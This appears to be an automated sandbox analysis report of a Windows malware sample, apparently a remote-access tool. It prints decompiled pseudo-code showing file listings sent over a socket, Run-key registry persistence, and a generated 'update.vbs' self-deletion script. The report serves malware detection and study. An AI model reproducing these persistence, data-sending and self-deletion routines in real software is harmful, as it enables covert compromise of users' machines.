                                      • Part of subcall function 00441CE2: SetLastError.KERNEL32(00000000,?,004170CE,-0046DD44,?,?,?,?,?,0040AEF2,.vbs), ref: 00441D5A
                                      • Part of subcall function 00441CE2: _abort.LIBCMT ref: 00441D60
                                      • Part of subcall function 00441CE2: _free.LIBCMT ref: 00441D41
                                      • Part of subcall function 00441CE2: SetLastError.KERNEL32(00000000,?,004170CE,-0046DD44,?,?,?,?,?,0040AEF2,.vbs), ref: 00441D4E
                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0044A397
                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0044A3E8
                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0044A4A8
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.518343742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 0000000C.00000002.519789237.000000000046F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: ErrorInfoLastLocale$_free$_abort
                                    • String ID:
                                    • API String ID: 2829624132-0
                                    • Opcode ID: b14c01951aef5a3ce9e700fe29605e893b340df90a5e0dffce6f4a8b69f02f7e
                                    • Instruction ID: b8f74ff5e519f84a9dadc1d099471af389f48447beb5eaa2b6f47629cec96164
                                    • Opcode Fuzzy Hash: b14c01951aef5a3ce9e700fe29605e893b340df90a5e0dffce6f4a8b69f02f7e
                                    • Instruction Fuzzy Hash: 8061C275980207ABFB289F25CD86B7A77A8EF04304F10807BE905C6681E77CDD61CB5A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,0043DD1F,?,00000004), ref: 0044240D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.518343742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 0000000C.00000002.519789237.000000000046F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: InfoLocale
                                    • String ID: GetLocaleInfoEx
                                    • API String ID: 2299586839-2904428671
                                    • Opcode ID: 30b810839b59ba11a6eae0aeef628e107f6b5eb1dc1d371d29b2301ee2a0ab54
                                    • Instruction ID: 96fabd543f80631915bdd4e6a3d78e1bd42830cecee988cc8e1c6fddece1edfb
                                    • Opcode Fuzzy Hash: 30b810839b59ba11a6eae0aeef628e107f6b5eb1dc1d371d29b2301ee2a0ab54
                                    • Instruction Fuzzy Hash: 89F0F631640318BBDB11AF61DC02F6E7F65EF04B02F50402AFC0567292CA799E259A9D
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • GetSystemTimeAsFileTime.KERNEL32(00000000,00435774), ref: 00442463
                                    Strings
                                    • GetSystemTimePreciseAsFileTime, xrefs: 0044243F
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.518343742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 0000000C.00000002.519789237.000000000046F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: Time$FileSystem
                                    • String ID: GetSystemTimePreciseAsFileTime
                                    • API String ID: 2086374402-595813830
                                    • Opcode ID: 276e188142dcba8552c0c5fd32c55eefcf231bfd4f8efebcb1a64ff43a26958e
                                    • Instruction ID: 09645e63eb2cf1ef7a1b77b1c5df07c01e3b03da8d5135b28a525b7943d7118a
                                    • Opcode Fuzzy Hash: 276e188142dcba8552c0c5fd32c55eefcf231bfd4f8efebcb1a64ff43a26958e
                                    • Instruction Fuzzy Hash: 93E05530B00718A787116F21AC02A3EBB60CB04F03B90017FFC095B282DAB94E059ADE
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 90%
                                    			E004153F5(char* __edx, void* __eflags, char _a8) {
                                    				struct _WIN32_FIND_DATAW _v1028;
                                    				char _v1036;
                                    				char _v1064;
                                    				char _v1088;
                                    				void* _v1092;
                                    				char _v1100;
                                    				char _v1116;
                                    				void* _v1120;
                                    				char _v1128;
                                    				char _v1136;
                                    				char _v1152;
                                    				char _v1156;
                                    				char _v1160;
                                    				void* _v1164;
                                    				char _v1172;
                                    				char _v1176;
                                    				void* _v1188;
                                    				char _v1196;
                                    				void* _v1200;
                                    				void* _v1204;
                                    				char _v1208;
                                    				char _v1220;
                                    				char _v1224;
                                    				char _v1228;
                                    				char _v1232;
                                    				char _v1236;
                                    				char _v1240;
                                    				char _v1252;
                                    				void* __ebx;
                                    				void* __esi;
                                    				void* __ebp;
                                    				intOrPtr* _t63;
                                    				int _t85;
                                    				int _t91;
                                    				void* _t102;
                                    				void* _t108;
                                    				void* _t109;
                                    				char* _t113;
                                    				void* _t115;
                                    				void* _t116;
                                    				void* _t130;
                                    				void* _t133;
                                    				void* _t228;
                                    				void* _t229;
                                    				signed int _t234;
                                    				void* _t237;
                                    				void* _t238;
                                    				void* _t239;
                                    				void* _t242;
                                    
                                    				_t242 = __eflags;
                                    				_t213 = __edx;
                                    				_push(_t139);
                                    				_t63 = L00401F95( &_a8);
                                    				E004042A6( &_a8,  &_v1100, 4, 0xffffffff);
                                    				_t237 = (_t234 & 0xfffffff8) - 0x4b4;
                                    				E004020EC(_t139, _t237, __edx, _t242, 0x46c238);
                                    				_t238 = _t237 - 0x18;
                                    				E004020EC(_t139, _t238, __edx, _t242,  &_v1116);
                                    				E00417478( &_v1252, _t213);
                                    				_t239 = _t238 + 0x30;
                                    				_t228 =  *_t63 - 0x19;
                                    				if(_t228 == 0) {
                                    					E004020D5(_t139,  &_v1220);
                                    					_t213 = 0x46c880;
                                    					L00407514( &_v1172, 0x46c880, __eflags, L"\\*");
                                    					_t229 = FindFirstFileW(L00401EEB( &_v1172),  &_v1028);
                                    					__eflags = _t229 - 0xffffffff;
                                    					if(__eflags == 0) {
                                    						L14:
                                    						E004020EC(_t139, _t239 - 0x18, _t213, __eflags,  &_v1220);
                                    						_push(0x5d);
                                    						L00404AA4(_t139, 0x46c918, _t213, __eflags);
                                    						L00401EF0();
                                    						L00401FC7();
                                    						goto L15;
                                    					}
                                    					E0040427F(_t139,  &_v1196,  &(_v1028.cFileName));
                                    					_t213 = ".";
                                    					_t85 = E004074E4(__eflags);
                                    					_t139 = _t85;
                                    					L00401EF0();
                                    					__eflags = _t85;
                                    					if(__eflags != 0) {
                                    						L00401FD1( &_v1228, ".", _t229, E004020AB(_t139,  &_v1196, ".", __eflags,  &_v1028, 0x250));
                                    						L00401FC7();
                                    					}
                                    					while(1) {
                                    						__eflags = FindNextFileW(_t229,  &_v1028);
                                    						if(__eflags == 0) {
                                    							goto L14;
                                    						}
                                    						E0040427F(_t139,  &_v1196,  &(_v1028.cFileName));
                                    						_t213 = L"..";
                                    						_t91 = E004074E4(__eflags);
                                    						_t139 = _t91;
                                    						L00401EF0();
                                    						__eflags = _t91;
                                    						if(__eflags != 0) {
                                    							E00403436(E004020AB(_t139,  &_v1196, L"..", __eflags,  &_v1028, 0x250));
                                    							L00401FC7();
                                    						}
                                    					}
                                    					goto L14;
                                    				} else {
                                    					_t244 = _t228 == 1;
                                    					if(_t228 == 1) {
                                    						_t102 = E004172DA( &_v1152, L00401E49( &_v1232, _t213, _t244, 1));
                                    						E00403030( &_v1176, L00407514( &_v1128, 0x46c880, _t244, "\\"), _t102);
                                    						L00401EF0();
                                    						L00401EF0();
                                    						E004020D5(_t139,  &_v1224);
                                    						_t108 = L00401EEB( &_v1176);
                                    						_t213 =  &_v1224;
                                    						_t109 = L004179DC(_t108,  &_v1224);
                                    						_t245 = _t109;
                                    						if(_t109 != 0) {
                                    							_t113 = L00401F95(L00401E49(0x46c578,  &_v1224, _t245, 0x1b));
                                    							_t246 =  *_t113 - 1;
                                    							if( *_t113 == 1) {
                                    								_t130 = E00402489();
                                    								L00405A7C( &_v1028, L00401F95(0x46c560), _t130);
                                    								_t133 = E00402489();
                                    								L00401FD1( &_v1240, _t213, 0x46c560, L00405BA4(_t139,  &_v1036, _t213,  &_v1156, L00401F95( &_v1228), _t133));
                                    								L00401FC7();
                                    							}
                                    							_t115 = L00401E49( &_v1232, _t213, _t246, 2);
                                    							_t116 = L00401E49( &_v1236, _t213, _t246, 0);
                                    							_t213 = L00402F93(_t139,  &_v1160, L00402F93(_t139,  &_v1136, L00402F93(_t139,  &_v1088, L00402F93(_t139,  &_v1064, L00402FB7( &_v1208, L00401E49( &_v1240, _t213, _t246, 1), 0x46c238), _t246, _t116), _t246, 0x46c238), _t246, _t115), _t246, 0x46c238);
                                    							L00402F93(_t139, _t239 - 0x18, _t122, _t246,  &_v1220);
                                    							_push(0x5e);
                                    							L00404AA4(_t139, 0x46c918, _t122, _t246);
                                    							L00401FC7();
                                    							L00401FC7();
                                    							L00401FC7();
                                    							L00401FC7();
                                    							L00401FC7();
                                    						}
                                    						L00401FC7();
                                    						L00401EF0();
                                    					}
                                    					L15:
                                    					L00401E74( &_v1252, _t213);
                                    					L00401FC7();
                                    					return L00401FC7();
                                    				}
                                    			}
                                    0x004153f5
                                    0x004153f5
                                    0x00415404
                                    0x00415407
                                    0x0041541d
                                    0x00415422
                                    0x0041542d
                                    0x00415432
                                    0x0041543f
                                    0x00415448
                                    0x0041544d
                                    0x00415450
                                    0x00415453
                                    0x00415620
                                    0x0041562a
                                    0x00415633
                                    0x00415651
                                    0x00415653
                                    0x00415656
                                    0x0041571d
                                    0x00415727
                                    0x0041572c
                                    0x00415733
                                    0x0041573c
                                    0x00415745
                                    0x00000000
                                    0x00415745
                                    0x00415668
                                    0x0041566d
                                    0x00415674
                                    0x0041567d
                                    0x0041567f
                                    0x00415684
                                    0x00415686
                                    0x004156a3
                                    0x004156ac
                                    0x004156ac
                                    0x0041570e
                                    0x00415719
                                    0x0041571b
                                    0x00000000
                                    0x00000000
                                    0x004156c5
                                    0x004156ca
                                    0x004156d1
                                    0x004156da
                                    0x004156dc
                                    0x004156e1
                                    0x004156e3
                                    0x00415700
                                    0x00415709
                                    0x00415709
                                    0x004156e3
                                    0x00000000
                                    0x00415459
                                    0x00415459
                                    0x0041545c
                                    0x00415473
                                    0x00415496
                                    0x004154a0
                                    0x004154a9
                                    0x004154b2
                                    0x004154bb
                                    0x004154c0
                                    0x004154c6
                                    0x004154cb
                                    0x004154cd
                                    0x004154e1
                                    0x004154e6
                                    0x004154e9
                                    0x004154f2
                                    0x00415507
                                    0x00415510
                                    0x00415536
                                    0x0041553f
                                    0x0041553f
                                    0x00415555
                                    0x00415562
                                    0x004155bc
                                    0x004155c0
                                    0x004155c6
                                    0x004155cd
                                    0x004155d6
                                    0x004155df
                                    0x004155eb
                                    0x004155f7
                                    0x00415600
                                    0x00415600
                                    0x00415609
                                    0x00415612
                                    0x00415612
                                    0x0041574a
                                    0x0041574e
                                    0x0041575a
                                    0x0041576d
                                    0x0041576d

                                    APIs
                                    • FindFirstFileW.KERNEL32(00000000,?), ref: 0041564B
                                    • FindNextFileW.KERNEL32(00000000,?,?), ref: 00415717
                                      • Part of subcall function 00407514: char_traits.LIBCPMT ref: 0040752F
                                      • Part of subcall function 004179DC: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,00000000,00000000,?,00408D8E), ref: 004179F9
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.518343742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 0000000C.00000002.519789237.000000000046F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: File$Find$CreateFirstNextchar_traits
                                    • String ID:
                                    • API String ID: 3100282071-0
                                    • Opcode ID: 3673a11da3fe41b4d4a25fb8ab1b3bde120ba6189303c758b554a664e1c5c213
                                    • Instruction ID: fc299df16d418c96fbb3dc7ae8f09247cd9b87a8735511f9070920f35661dee3
                                    • Opcode Fuzzy Hash: 3673a11da3fe41b4d4a25fb8ab1b3bde120ba6189303c758b554a664e1c5c213
                                    • Instruction Fuzzy Hash: DB81A6311183409BC314F722C856EEF73A9AF91348F40453FF596671E2EF389A49CA9A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 82%
                                    			E004061C3(char _a4) {
                                    				char _v28;
                                    				char _v52;
                                    				char _v76;
                                    				struct _WIN32_FIND_DATAW _v668;
                                    				void* __ebx;
                                    				void* __esi;
                                    				int _t29;
                                    				void* _t34;
                                    				void* _t49;
                                    				void* _t73;
                                    				void* _t74;
                                    
                                    				_t73 = FindFirstFileW(L00401EEB( &_a4),  &_v668);
                                    				_t77 = _t73 - 0xffffffff;
                                    				if(_t73 != 0xffffffff) {
                                    					E004020D5(_t49,  &_v28);
                                    					E0040427F(_t49,  &_v52,  &(_v668.cFileName));
                                    					_t71 = ".";
                                    					_t29 = E004074E4(__eflags);
                                    					_t50 = _t29;
                                    					L00401EF0();
                                    					__eflags = _t29;
                                    					if(__eflags != 0) {
                                    						L00401FD1( &_v28, ".", _t73, E004020AB(_t50,  &_v52, ".", __eflags,  &_v668, 0x250));
                                    						L5:
                                    						L00401FC7();
                                    					}
                                    					__eflags = FindNextFileW(_t73,  &_v668);
                                    					if(__eflags != 0) {
                                    						_t34 = E004020AB(_t50,  &_v76, _t71, __eflags,  &_v668, 0x250);
                                    						_t71 =  &_v28;
                                    						L00401FD1( &_v28,  &_v28, _t73, E004074F0(_t50,  &_v52,  &_v28, __eflags, _t34));
                                    						L00401FC7();
                                    						goto L5;
                                    					}
                                    					E004020EC(_t50, _t74 - 0x18, _t71, __eflags,  &_v28);
                                    					_push(0x50);
                                    					L00404AA4(_t50, 0x46c2e8, _t71, __eflags);
                                    					L00401FC7();
                                    				} else {
                                    					E0041739C(_t49, _t74 - 0x18,  &_a4);
                                    					_push(0x54);
                                    					L00404AA4(_t49, 0x46c2e8,  &_a4, _t77);
                                    				}
                                    				return L00401EF0();
                                    			}

                                    APIs
                                    • FindFirstFileW.KERNEL32(00000000,?), ref: 004061DE
                                    • FindNextFileW.KERNEL32(00000000,?,?), ref: 0040629E
                                      • Part of subcall function 00404AA4: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B18
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.518343742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 0000000C.00000002.519789237.000000000046F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: FileFind$FirstNextsend
                                    • String ID:
                                    • API String ID: 4113138495-0
                                    • Opcode ID: 1d816a77bb2de0c84dabe2ff0fac833b535f603402e02c0b0ac7444ea8aed486
                                    • Instruction ID: 05b06413529d47d56342622e5ae20bd3e82c8e6dc30fd3fa753989dbabbba416
                                    • Opcode Fuzzy Hash: 1d816a77bb2de0c84dabe2ff0fac833b535f603402e02c0b0ac7444ea8aed486
                                    • Instruction Fuzzy Hash: 442198319102099ACB14FBA6CC96DEF7778AF55304F40017FF906761D2EF385A49CA99
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.518343742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 0000000C.00000002.519789237.000000000046F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: L/B
                                    • API String ID: 0-202356071
                                    • Opcode ID: 76de492c9c07f0eb7c158ab6622f4411f8f17a6eccbc349bd2954d67055dc0a1
                                    • Instruction ID: af44c839d919a06cb4036c0461bacdbed32545edb78db0b7c7cb8e0092a3767b
                                    • Opcode Fuzzy Hash: 76de492c9c07f0eb7c158ab6622f4411f8f17a6eccbc349bd2954d67055dc0a1
                                    • Instruction Fuzzy Hash: 12E1B330A10028AFCB08CF5DE9A287E73F1FB49301755416EE582E7391DA74FA12EB95
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                      • Part of subcall function 00441CE2: GetLastError.KERNEL32(?,00000000,0043B8C2,?,004170CE,-0046DD44,?,?,?,?,?,0040AEF2,.vbs), ref: 00441CE6
                                      • Part of subcall function 00441CE2: _free.LIBCMT ref: 00441D19
                                      • Part of subcall function 00441CE2: SetLastError.KERNEL32(00000000,?,004170CE,-0046DD44,?,?,?,?,?,0040AEF2,.vbs), ref: 00441D5A
                                      • Part of subcall function 00441CE2: _abort.LIBCMT ref: 00441D60
                                    • EnumSystemLocalesW.KERNEL32(0044A343,00000001,00000000,?,0043E2C1,?,0044A970,00000000,?,?,?), ref: 0044A28D
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.518343742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 0000000C.00000002.519789237.000000000046F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                    • String ID:
                                    • API String ID: 1084509184-0
                                    • Opcode ID: 3f4933a1a1ee220f0dbad5b64f72dc4827fcab8f9caec66703019ab1352aed1c
                                    • Instruction ID: fef6e57728511f2b9b1dd238f7a777dd7648a2b970c096311ec5bc0c4a713da2
                                    • Opcode Fuzzy Hash: 3f4933a1a1ee220f0dbad5b64f72dc4827fcab8f9caec66703019ab1352aed1c
                                    • Instruction Fuzzy Hash: 3F114C372007055FEB189F39C8916BBB791FF80359B14442DE98647740E7B6B952DB44
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                      • Part of subcall function 00441CE2: GetLastError.KERNEL32(?,00000000,0043B8C2,?,004170CE,-0046DD44,?,?,?,?,?,0040AEF2,.vbs), ref: 00441CE6
                                      • Part of subcall function 00441CE2: _free.LIBCMT ref: 00441D19
                                      • Part of subcall function 00441CE2: SetLastError.KERNEL32(00000000,?,004170CE,-0046DD44,?,?,?,?,?,0040AEF2,.vbs), ref: 00441D5A
                                      • Part of subcall function 00441CE2: _abort.LIBCMT ref: 00441D60
                                    • EnumSystemLocalesW.KERNEL32(0044A593,00000001,?,?,0043E2C1,?,0044A934,0043E2C1,?,?,?,?,?,0043E2C1,?,?), ref: 0044A302
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.518343742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 0000000C.00000002.519789237.000000000046F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                    • String ID:
                                    • API String ID: 1084509184-0
                                    • Opcode ID: e6193cd3b2cb708b7780c009108bef3b0113aba1580a16d571c1eda4c60849ca
                                    • Instruction ID: b467c6c7c7f8ac7ca1ad2f3a7ac430e87e8f1bd3a8912e360415dfb464baff1b
                                    • Opcode Fuzzy Hash: e6193cd3b2cb708b7780c009108bef3b0113aba1580a16d571c1eda4c60849ca
                                    • Instruction Fuzzy Hash: 28F022323403045FEB149F399C81A6A7B95FF80368B14443EF9418B690E6B6DC419A04
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                      • Part of subcall function 00441CE2: GetLastError.KERNEL32(?,00000000,0043B8C2,?,004170CE,-0046DD44,?,?,?,?,?,0040AEF2,.vbs), ref: 00441CE6
                                      • Part of subcall function 00441CE2: _free.LIBCMT ref: 00441D19
                                      • Part of subcall function 00441CE2: SetLastError.KERNEL32(00000000,?,004170CE,-0046DD44,?,?,?,?,?,0040AEF2,.vbs), ref: 00441D5A
                                      • Part of subcall function 00441CE2: _abort.LIBCMT ref: 00441D60
                                    • EnumSystemLocalesW.KERNEL32(0044A127,00000001,?,?,?,0044A992,0043E2C1,?,?,?,?,?,0043E2C1,?,?,?), ref: 0044A207
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.518343742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 0000000C.00000002.519789237.000000000046F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                    • String ID:
                                    • API String ID: 1084509184-0
                                    • Opcode ID: fa2dd48da86d2843f62e137803b5bb2482421d1c388bbb34657bff8fd84012d4
                                    • Instruction ID: a7fadff6d2ca21f630832dc779862bf22c9b6182ed5b4a5894b7910ac126a48e
                                    • Opcode Fuzzy Hash: fa2dd48da86d2843f62e137803b5bb2482421d1c388bbb34657bff8fd84012d4
                                    • Instruction Fuzzy Hash: 1FF0553A38030557EB049F75DC49B6BBFA0FFC1719F06405AEA058B690C67AD942CB54
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,00411E51,0046C238,0046C5B4,0046C238,00000000,0046C238,00000000,0046C238,3.2.1 Pro), ref: 0040D1F9
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.518343742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 0000000C.00000002.519789237.000000000046F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: InfoLocale
                                    • String ID:
                                    • API String ID: 2299586839-0
                                    • Opcode ID: 4c1a934f5ac5a3c0cab132a0d4aa1abdd1fcf80b677e654e19d5e57048290400
                                    • Instruction ID: ac7816e6a697d777cf06a73d6884089d523ece1dfcb51b9ad9a20d9ec724333c
                                    • Opcode Fuzzy Hash: 4c1a934f5ac5a3c0cab132a0d4aa1abdd1fcf80b677e654e19d5e57048290400
                                    • Instruction Fuzzy Hash: 47D05E7074021DBBEA14D6959C0AEAB7B9CD701B66F0001A6BE04D72C0E9E1AE04C7E1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.518343742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 0000000C.00000002.519789237.000000000046F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: 0
                                    • API String ID: 0-4108050209
                                    • Opcode ID: 84d520a0f70926c0a60d58c698a882ed3c5d158336cfdaa718a2f8f638245402
                                    • Instruction ID: 656339de93b15354355cc6fc116552e81dda14c8a7802dd6a12fd3361ec49b7a
                                    • Opcode Fuzzy Hash: 84d520a0f70926c0a60d58c698a882ed3c5d158336cfdaa718a2f8f638245402
                                    • Instruction Fuzzy Hash: AC515170204B495BEF38456844457BFE3989B6E744F18298FFC82D7382CE5EED06825E
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.518343742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 0000000C.00000002.519789237.000000000046F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                    • Instruction ID: 89fb698572b7cf86533d0eea82b05fcf403d339a8e9ac14319646ffa1aaa429a
                                    • Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                    • Instruction Fuzzy Hash: 67C1D8322060534ADF2D463984341BFBAA09EE57B1B1A276FD4B3CF2C4EF18E964D524
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.518343742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 0000000C.00000002.519789237.000000000046F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 21b115038f7e4976344a74245cac352abb538fa6c5ac7dc22365ff8df30af6da
                                    • Instruction ID: b367387755e38c2acd2464c16e73056793f51d4de4b8bca9bcadcc32440fe761
                                    • Opcode Fuzzy Hash: 21b115038f7e4976344a74245cac352abb538fa6c5ac7dc22365ff8df30af6da
                                    • Instruction Fuzzy Hash: 84615B7120070A77DE389A2888927BFE3949B6D304F14391FF942DB781EE1DDD42825E
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.518343742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 0000000C.00000002.519789237.000000000046F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: fce7a91475ddc2f1612e9a8a03468a5b99e4f47943d3026f662be594c0441147
                                    • Instruction ID: 6a2ad8edffecebfcaae903e9719156c7a0c76254d9b187d9e67c469d6c3393be
                                    • Opcode Fuzzy Hash: fce7a91475ddc2f1612e9a8a03468a5b99e4f47943d3026f662be594c0441147
                                    • Instruction Fuzzy Hash: CB613C31E0021AABDF08DFB9D5815EFB7B2FF8C304F50812AE425BB250DA746A058B94
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.518343742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 0000000C.00000002.519789237.000000000046F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: c845c6cc5c459e0427f3b6d9b164718d9ff2b4bcf1554f86a141997a7a1484ed
                                    • Instruction ID: 7a46c63e6297807c5de7f1130092129a1d39734970edeb025e6968c5830d1d5b
                                    • Opcode Fuzzy Hash: c845c6cc5c459e0427f3b6d9b164718d9ff2b4bcf1554f86a141997a7a1484ed
                                    • Instruction Fuzzy Hash: 8F315A75A00115AFCB20CF59CD81B5AB7A9FF48354F1580B6ED04AB382D375EA64CB98
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 98%
                                    			E0040B0E2(char _a4) {
                                    				char _v28;
                                    				char _v52;
                                    				char _v76;
                                    				char _v100;
                                    				char _v124;
                                    				char _v148;
                                    				char _v172;
                                    				short _v692;
                                    				void* __ebx;
                                    				void* __edi;
                                    				void* __ebp;
                                    				void* _t53;
                                    				void* _t54;
                                    				void* _t57;
                                    				signed int _t61;
                                    				void* _t62;
                                    				void* _t78;
                                    				void* _t79;
                                    				void* _t92;
                                    				void* _t93;
                                    				signed char _t134;
                                    				void* _t243;
                                    				void* _t245;
                                    				void* _t246;
                                    				void* _t247;
                                    
                                    				E0041015B();
                                    				if( *0x46a9d4 != 0x30) {
                                    					L00409D73();
                                    				}
                                    				_t243 =  *0x46bd6b - 1; // 0x0
                                    				if(_t243 == 0) {
                                    					E0041537E(_t243);
                                    				}
                                    				if( *0x46ba75 != 0) {
                                    					L00417754(L00401EEB(0x46c0e0));
                                    				}
                                    				_t231 = L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\";
                                    				_t245 =  *0x46bb02 - 1; // 0x1
                                    				if(_t245 == 0) {
                                    					L00410D5C(0x80000001, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", L00401EEB(0x46c4e8));
                                    				}
                                    				_t246 =  *0x46bafb - 1; // 0x0
                                    				if(_t246 == 0) {
                                    					L00410D5C(0x80000002, _t231, L00401EEB(0x46c4e8));
                                    				}
                                    				_t247 =  *0x46bb00 - 1; // 0x0
                                    				if(_t247 == 0) {
                                    					L00410D5C(0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\\", L00401EEB(0x46c4e8));
                                    				}
                                    				_t53 = E00402489();
                                    				_t54 = L00401F95(0x46c560);
                                    				_t57 = L00410A30(L00401F95(0x46c518), "exepath",  &_v692, 0x208, _t54, _t53);
                                    				_t248 = _t57;
                                    				if(_t57 == 0) {
                                    					GetModuleFileNameW(0,  &_v692, 0x208);
                                    				}
                                    				RegDeleteKeyA(0x80000001, L00401F95(0x46c518));
                                    				_t61 = SetFileAttributesW( &_v692, 0x80);
                                    				_t140 = 0x46c530;
                                    				asm("sbb bl, bl");
                                    				_t134 =  ~_t61 & 0x00000001;
                                    				_t62 = E004074E4(_t248);
                                    				_t249 = _t62;
                                    				if(_t62 != 0) {
                                    					_t140 = 0x46c530;
                                    					SetFileAttributesW(L00401EEB(0x46c530), 0x80);
                                    				}
                                    				E004030A6(_t134,  &_v124, E0040427F(_t134,  &_v52, L0043987F(_t134, _t140, _t249, L"Temp")), 0, _t249, L"\\update.vbs");
                                    				L00401EF0();
                                    				E00404405(_t134,  &_v28, L"On Error Resume Next\n", _t249, E0040427F(_t134,  &_v52, L"Set fso = CreateObject(\"Scripting.FileSystemObject\")\n"));
                                    				L00401EF0();
                                    				_t250 = _t134;
                                    				if(_t134 != 0) {
                                    					E00403311(E004030A6(_t134,  &_v52, E00404405(_t134,  &_v76, L"while fso.FileExists(\"", _t250, E0040427F(_t134,  &_v100,  &_v692)), 0, _t250, L"\")\n"));
                                    					L00401EF0();
                                    					L00401EF0();
                                    					L00401EF0();
                                    				}
                                    				E00403311(E004030A6(_t134,  &_v100, E004030A6(_t134,  &_v76, E0040427F(_t134,  &_v52, L"fso.DeleteFile \""), 0, _t250,  &_v692), 0, _t250, L"\"\n"));
                                    				L00401EF0();
                                    				L00401EF0();
                                    				L00401EF0();
                                    				_t251 = _t134;
                                    				if(_t134 != 0) {
                                    					L0040766C(_t134,  &_v28, 0, L"wend\n");
                                    				}
                                    				_t78 = E004074E4(_t251);
                                    				_t252 = _t78;
                                    				if(_t78 != 0) {
                                    					E00403311(E004030A6(0x45f724,  &_v100, L00409E69( &_v76, L"fso.DeleteFolder \"", _t252, 0x46c530), 0, _t252, L"\"\n"));
                                    					L00401EF0();
                                    					L00401EF0();
                                    				}
